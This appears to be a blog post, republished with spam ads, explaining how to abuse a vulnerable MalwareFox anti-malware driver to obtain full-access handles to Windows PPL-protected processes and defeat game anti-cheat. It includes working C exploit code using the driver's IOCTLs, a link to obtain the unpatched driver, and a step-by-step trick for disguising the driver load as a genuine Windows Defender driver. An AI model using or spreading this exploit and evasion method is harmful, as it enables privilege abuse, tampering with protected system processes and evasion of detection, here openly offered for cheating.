Bypass PPL Protected Processes (Protected Process Light)

Using a vulnerable driver, we can Bypass PPL Protected Processes. A Protected Process Light is part of an anti-cheat engine for certain games. To put it bluntly, we can use a vulnerability in MalwareFox Anti-Malware driver to get an all access inheritable process handle to PPL protected processes, therefore bypassing PPL protection. 

Bypass PPL Protected Processes

On the 2nd of February 2018), a vulnerability got publicly released under the ID CVE-2018-6593

Here is the description: An issue was discovered in MalwareFox AntiMalware 2.74.0.150. Improper access control in zam32.sys and zam64.sys allows a non-privileged process to register itself with the driver by connecting to the filter communication port and then using IOCTL 0x8000204C to ZemanaAntiMalware to elevate privileges.

Along with the vulnerability a public exploit was disclosed exploiting it. In this exploit, the exploiting process registers itself with the vulnerable driver and then gain the ability to use the normally restricted IOCTLs of the driver. One of them allows you to get an all access inheritable process handle created from kernel thanks to the driver. I then tried to get a process handle on BE & EAC protected games, but unfortunately, the handle permissions gets modified like a handle created from a normal (Nt)OpenProcess. But then I thought about the driver. It seemed useless for the shady things you and I are interested in, when suddenly an idea came to my mind:
How about using this driver to get a fully privileged process handle on a PPL protected process, let's say CSRSS on Windows 10 x64 for example?

Bypass PPL Protected Processes

Bypass PPL Protected Processes

Thanks to this handle you can now take control of the process, and  run your hacks from it. I tested the other day and even with the up to date anti-malware software, I can still exploit their driver, so you can just download their software and do it yourself. Remember, you do not have to keep the driver loaded, you can simply load the driver, get the handle, and unload the driver.

You can get a piece of the vulnerable software here (in case it gets updated and fixed later). However the official site is located here. Personally, I only use Emsisoft (try it free for 30 days) but it will not work with this hack to Bypass PPL Protected Processes.

buy private proxies
Use a Proxy Firewall to force Traffic through your proxies.

Using Stealth when you Bypass PPL Protected Processes

I have little to no experience in leveraging vulnerable drivers for cheating purposes so I cannot give you precise recommendations to hide the fact that you loaded this driver. But it should not matter, since this is anti-malware, not a known hack tool. I did read that Windows log keeps track of recently loaded drivers, and having this driver loaded then directly unloaded in the logs might raise suspicion. But I am not sure that games are able to check the logs. 

If the logs only shows that the driver at path "C:\something\driver.sys" was loaded, you could find a driver that many people have (e.g. Windows Defender driver that comes natively with all modern windows, let's say that it's located in Windows\System32\defender.sys) then in your bypass installer:

  1. Rename the genuine driver as *.sys.tmp
  2. Move & rename MalwareFox driver to be at the exact location of the genuine driver that we just moved
  3. Load driver, get your handle, unload driver
  4. Delete MalwareFox driver from where we copied it
  5. Rename the genuine driver back to its original name

If the game checks the list of recently loaded drivers it'll see that a driver at path Windows\System32\defender.sys was loaded, and if they check what this driver is, they'll see a genuine wide-spread driver.

Can you survive what's about to come? Prepare now with this e-book

Example Code to Bypass PPL Protected Processes

This code doesn't include loading and unloading the driver, it supposes that the driver is already loaded. You can find the functions to load and unload a driver programatically on Google/Stackoverflow easily.

  1. #pragma once
  2. #include <Windows.h>
  3.  
  4. HANDLE MFAMGetHandle(DWORD pid) {
  5. // Connecting the vulnerable driver (MalwareFox AntiMalware 2.74.0.150, Local Privilege Escalation, CVE-2018-6606)
  6. HANDLE hDevice = CreateFile(L"\\\\.\\ZemanaAntiMalware", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  7. if (hDevice == INVALID_HANDLE_VALUE)
  8. return (HANDLE)0x0;
  9. // Registering our process with the driver
  10. DWORD ourPID = GetCurrentProcessId();
  11. if (!DeviceIoControl(hDevice, 0x80002010, &ourPID, sizeof(DWORD), NULL, 0, NULL, NULL)) {
  12. CloseHandle(hDevice);
  13. return (HANDLE)0x0;
  14. }
  15. // Using IOCTL to get full access process handle
  16. HANDLE hProcess = NULL;
  17. DeviceIoControl(hDevice, 0x8000204C, &pid, sizeof(DWORD), &hProcess, sizeof(HANDLE), NULL, NULL);
  18. CloseHandle(hDevice);
  19. return hProcess;
  20. }

I hope some of you find some use to this info on how to Bypass PPL Protected Processes.

credit to harakirinox for the above information on how to Bypass PPL Protected Processes

Leave a Reply

Your email address will not be published. Required fields are marked *

s2Member®